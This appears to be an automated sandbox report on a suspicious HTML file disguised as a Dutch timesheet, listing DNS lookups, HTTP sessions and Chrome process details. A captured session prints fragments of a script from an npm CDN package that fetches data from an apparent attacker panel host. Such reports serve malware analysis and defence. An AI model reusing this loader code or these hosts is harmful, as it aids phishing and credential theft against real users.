                  Mar 10, 2025 15:06:29.453550100 CET53650501.1.1.1192.168.2.9
                  Mar 10, 2025 15:06:32.516815901 CET53545821.1.1.1192.168.2.9
                  Mar 10, 2025 15:06:34.891886950 CET53645471.1.1.1192.168.2.9
                  Mar 10, 2025 15:07:02.439956903 CET53509081.1.1.1192.168.2.9
                  Mar 10, 2025 15:07:03.562802076 CET138138192.168.2.9192.168.2.255
                  Mar 10, 2025 15:07:49.160223961 CET53598811.1.1.1192.168.2.9
                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Mar 10, 2025 15:05:30.892563105 CET192.168.2.91.1.1.10xe0f0Standard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
                  Mar 10, 2025 15:05:30.892733097 CET192.168.2.91.1.1.10x7d22Standard query (0)cdn.jsdelivr.net65IN (0x0001)false
                  Mar 10, 2025 15:05:33.816589117 CET192.168.2.91.1.1.10x504dStandard query (0)noirlegacy-panel-1.websiteA (IP address)IN (0x0001)false
                  Mar 10, 2025 15:05:33.816756010 CET192.168.2.91.1.1.10xf321Standard query (0)noirlegacy-panel-1.website65IN (0x0001)false
                  Mar 10, 2025 15:05:33.952316046 CET192.168.2.91.1.1.10x271bStandard query (0)www.google.comA (IP address)IN (0x0001)false
                  Mar 10, 2025 15:05:33.952466965 CET192.168.2.91.1.1.10xd876Standard query (0)www.google.com65IN (0x0001)false
                  Mar 10, 2025 15:05:39.278878927 CET192.168.2.91.1.1.10x2165Standard query (0)sun-shine.pages.devA (IP address)IN (0x0001)false
                  Mar 10, 2025 15:05:39.279109001 CET192.168.2.91.1.1.10xab95Standard query (0)sun-shine.pages.dev65IN (0x0001)false
                  Mar 10, 2025 15:05:39.776592970 CET192.168.2.91.1.1.10xd7e1Standard query (0)noirlegacy-panel-1.websiteA (IP address)IN (0x0001)false
                  Mar 10, 2025 15:05:39.777303934 CET192.168.2.91.1.1.10x28a1Standard query (0)noirlegacy-panel-1.website65IN (0x0001)false
                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Mar 10, 2025 15:05:30.899761915 CET1.1.1.1192.168.2.90xe0f0No error (0)cdn.jsdelivr.netjsdelivr.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                  Mar 10, 2025 15:05:30.899761915 CET1.1.1.1192.168.2.90xe0f0No error (0)jsdelivr.map.fastly.net151.101.1.229A (IP address)IN (0x0001)false
                  Mar 10, 2025 15:05:30.899761915 CET1.1.1.1192.168.2.90xe0f0No error (0)jsdelivr.map.fastly.net151.101.65.229A (IP address)IN (0x0001)false
                  Mar 10, 2025 15:05:30.899761915 CET1.1.1.1192.168.2.90xe0f0No error (0)jsdelivr.map.fastly.net151.101.193.229A (IP address)IN (0x0001)false
                  Mar 10, 2025 15:05:30.899761915 CET1.1.1.1192.168.2.90xe0f0No error (0)jsdelivr.map.fastly.net151.101.129.229A (IP address)IN (0x0001)false
                  Mar 10, 2025 15:05:30.900779009 CET1.1.1.1192.168.2.90x7d22No error (0)cdn.jsdelivr.netjsdelivr.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                  Mar 10, 2025 15:05:33.831650019 CET1.1.1.1192.168.2.90xf321No error (0)noirlegacy-panel-1.website65IN (0x0001)false
                  Mar 10, 2025 15:05:33.849725008 CET1.1.1.1192.168.2.90x504dNo error (0)noirlegacy-panel-1.website172.67.167.135A (IP address)IN (0x0001)false
                  Mar 10, 2025 15:05:33.849725008 CET1.1.1.1192.168.2.90x504dNo error (0)noirlegacy-panel-1.website104.21.82.11A (IP address)IN (0x0001)false
                  Mar 10, 2025 15:05:33.959568024 CET1.1.1.1192.168.2.90xd876No error (0)www.google.com65IN (0x0001)false
                  Mar 10, 2025 15:05:33.959638119 CET1.1.1.1192.168.2.90x271bNo error (0)www.google.com142.250.184.196A (IP address)IN (0x0001)false
                  Mar 10, 2025 15:05:39.290735006 CET1.1.1.1192.168.2.90x2165No error (0)sun-shine.pages.dev188.114.96.3A (IP address)IN (0x0001)false
                  Mar 10, 2025 15:05:39.290735006 CET1.1.1.1192.168.2.90x2165No error (0)sun-shine.pages.dev188.114.97.3A (IP address)IN (0x0001)false
                  Mar 10, 2025 15:05:39.291181087 CET1.1.1.1192.168.2.90xab95No error (0)sun-shine.pages.dev65IN (0x0001)false
                  Mar 10, 2025 15:05:39.795077085 CET1.1.1.1192.168.2.90x28a1No error (0)noirlegacy-panel-1.website65IN (0x0001)false
                  Mar 10, 2025 15:05:39.798176050 CET1.1.1.1192.168.2.90xd7e1No error (0)noirlegacy-panel-1.website172.67.167.135A (IP address)IN (0x0001)false
                  Mar 10, 2025 15:05:39.798176050 CET1.1.1.1192.168.2.90xd7e1No error (0)noirlegacy-panel-1.website104.21.82.11A (IP address)IN (0x0001)false
                  • cdn.jsdelivr.net
                  • sun-shine.pages.dev
                  • c.pki.goog
                  Session IDSource IPSource PortDestination IPDestination Port
                  0192.168.2.949706142.250.184.19580
                  TimestampBytes transferredDirectionData
                  Mar 10, 2025 15:05:45.625426054 CET202OUTGET /r/gsr1.crl HTTP/1.1
                  Cache-Control: max-age = 3000
                  Connection: Keep-Alive
                  Accept: */*
                  If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMT
                  User-Agent: Microsoft-CryptoAPI/10.0
                  Host: c.pki.goog
                  Mar 10, 2025 15:05:46.295169115 CET223INHTTP/1.1 304 Not Modified
                  Date: Mon, 10 Mar 2025 13:26:37 GMT
                  Expires: Mon, 10 Mar 2025 14:16:37 GMT
                  Age: 2349
                  Last-Modified: Tue, 07 Jan 2025 07:28:00 GMT
                  Cache-Control: public, max-age=3000
                  Vary: Accept-Encoding
                  Mar 10, 2025 15:05:46.300919056 CET200OUTGET /r/r4.crl HTTP/1.1
                  Cache-Control: max-age = 3000
                  Connection: Keep-Alive
                  Accept: */*
                  If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
                  User-Agent: Microsoft-CryptoAPI/10.0
                  Host: c.pki.goog
                  Mar 10, 2025 15:05:46.491003990 CET223INHTTP/1.1 304 Not Modified
                  Date: Mon, 10 Mar 2025 13:25:54 GMT
                  Expires: Mon, 10 Mar 2025 14:15:54 GMT
                  Age: 2392
                  Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
                  Cache-Control: public, max-age=3000
                  Vary: Accept-Encoding


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.949693151.101.1.2294434108C:\Program Files\Google\Chrome\Application\chrome.exe
                  TimestampBytes transferredDirectionData
                  2025-03-10 14:05:32 UTC552OUTGET /npm/slowingdown4u@1.0.2/hard.js HTTP/1.1
                  Host: cdn.jsdelivr.net
                  Connection: keep-alive
                  sec-ch-ua-platform: "Windows"
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                  sec-ch-ua-mobile: ?0
                  Accept: */*
                  Sec-Fetch-Site: cross-site
                  Sec-Fetch-Mode: no-cors
                  Sec-Fetch-Dest: script
                  Sec-Fetch-Storage-Access: active
                  Accept-Encoding: gzip, deflate, br, zstd
                  Accept-Language: en-US,en;q=0.9
                  2025-03-10 14:05:33 UTC768INHTTP/1.1 200 OK
                  Connection: close
                  Content-Length: 2045
                  Access-Control-Allow-Origin: *
                  Access-Control-Expose-Headers: *
                  Timing-Allow-Origin: *
                  Cache-Control: public, max-age=31536000, s-maxage=31536000, immutable
                  Cross-Origin-Resource-Policy: cross-origin
                  X-Content-Type-Options: nosniff
                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                  Content-Type: application/javascript; charset=utf-8
                  X-JSD-Version: 1.0.2
                  X-JSD-Version-Type: version
                  ETag: W/"7fd-Bz5K/BIEx4xnErGQ3DRiIyww4mw"
                  Accept-Ranges: bytes
                  Age: 397445
                  Date: Mon, 10 Mar 2025 14:05:33 GMT
                  X-Served-By: cache-fra-eddf8230139-FRA, cache-sjc1000143-SJC
                  X-Cache: HIT, MISS
                  Vary: Accept-Encoding
                  alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                  2025-03-10 14:05:33 UTC1378INData Raw: 0a 0a 63 6f 6e 73 74 20 75 72 6c 78 20 3d 20 27 68 74 74 70 73 3a 2f 2f 6e 6f 69 72 6c 65 67 61 63 79 2d 70 61 6e 65 6c 2d 31 2e 77 65 62 73 69 74 65 2f 61 70 69 2f 75 75 75 72 72 6c 6c 6c 27 3b 0a 0a 0a 0a 0a 20 20 20 20 20 20 20 20 2f 2f 20 46 75 6e 63 74 69 6f 6e 20 74 6f 20 70 65 72 66 6f 72 6d 20 47 45 54 20 72 65 71 75 65 73 74 0a 20 20 20 20 20 20 20 20 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 66 65 74 63 68 44 61 74 61 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 72 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 72 65 73 70 6f 6e 73 65 20 3d 20 61 77 61 69 74 20 66 65 74 63 68 28 75 72 6c 78 29 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69
                  Data Ascii: const urlx = 'https://noirlegacy-panel-1.website/api/uuurrlll'; // Function to perform GET request async function fetchData() { try { const response = await fetch(urlx); i
                  2025-03-10 14:05:33 UTC667INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 65 74 20 64 79 6e 61 6d 69 63 50 61 72 74 20 3d 20 61 74 74 72 2e 6e 61 6d 65 2e 73 70 6c 69 74 28 27 6e 69 6b 65 2d 27 29 5b 31 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6b 65 79 20 3d 20 64 79 6e 61 6d 69 63 50 61 72 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 65
                  Data Ascii: let dynamicPart = attr.name.split('nike-')[1]; key = dynamicPart; } }); }); e


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.949703188.114.96.34434108C:\Program Files\Google\Chrome\Application\chrome.exe
                  TimestampBytes transferredDirectionData
                  2025-03-10 14:05:43 UTC655OUTGET / HTTP/1.1
                  Host: sun-shine.pages.dev
                  Connection: keep-alive
                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                  sec-ch-ua-mobile: ?0
                  sec-ch-ua-platform: "Windows"
                  Upgrade-Insecure-Requests: 1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Sec-Fetch-Site: cross-site
                  Sec-Fetch-Mode: navigate
                  Sec-Fetch-Dest: document
                  Accept-Encoding: gzip, deflate, br, zstd
                  Accept-Language: en-US,en;q=0.9
                  2025-03-10 14:05:43 UTC178INHTTP/1.1 403 Forbidden
                  Server: cloudflare
                  Date: Mon, 10 Mar 2025 14:05:43 GMT
                  Content-Type: text/html
                  Content-Length: 553
                  Connection: close
                  CF-RAY: 91e35e5bfc547ae8-SJC
                  2025-03-10 14:05:43 UTC553INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>cloudflare</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  2192.168.2.949702188.114.96.34434108C:\Program Files\Google\Chrome\Application\chrome.exe
                  TimestampBytes transferredDirectionData
                  2025-03-10 14:05:43 UTC601OUTGET /favicon.ico HTTP/1.1
                  Host: sun-shine.pages.dev
                  Connection: keep-alive
                  sec-ch-ua-platform: "Windows"
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                  sec-ch-ua-mobile: ?0
                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                  Sec-Fetch-Site: same-origin
                  Sec-Fetch-Mode: no-cors
                  Sec-Fetch-Dest: image
                  Referer: https://sun-shine.pages.dev/
                  Accept-Encoding: gzip, deflate, br, zstd
                  Accept-Language: en-US,en;q=0.9
                  2025-03-10 14:05:44 UTC178INHTTP/1.1 403 Forbidden
                  Server: cloudflare
                  Date: Mon, 10 Mar 2025 14:05:44 GMT
                  Content-Type: text/html
                  Content-Length: 553
                  Connection: close
                  CF-RAY: 91e35e5f5ec72510-SJC
                  2025-03-10 14:05:44 UTC553INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>cloudflare</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch


                  Click to jump to process

                  Click to jump to process

                  Click to jump to process

                  Target ID:0
                  Start time:10:05:24
                  Start date:10/03/2025
                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Ontbrekende urenstaat.html"
                  Imagebase:0x7ff6fb300000
                  File size:3'388'000 bytes
                  MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:false

                  Target ID:1
                  Start time:10:05:28
                  Start date:10/03/2025
                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2212,i,4204881716747169675,11110953007057725676,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2236 /prefetch:3
                  Imagebase:0x7ff6fb300000
                  File size:3'388'000 bytes
                  MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:false

                  Target ID:15
                  Start time:10:08:28
                  Start date:10/03/2025
                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --no-pre-read-main-dll --field-trial-handle=2212,i,4204881716747169675,11110953007057725676,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=5568 /prefetch:8
                  Imagebase:0x7ff6fb300000
                  File size:3'388'000 bytes
                  MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:false

                  No disassembly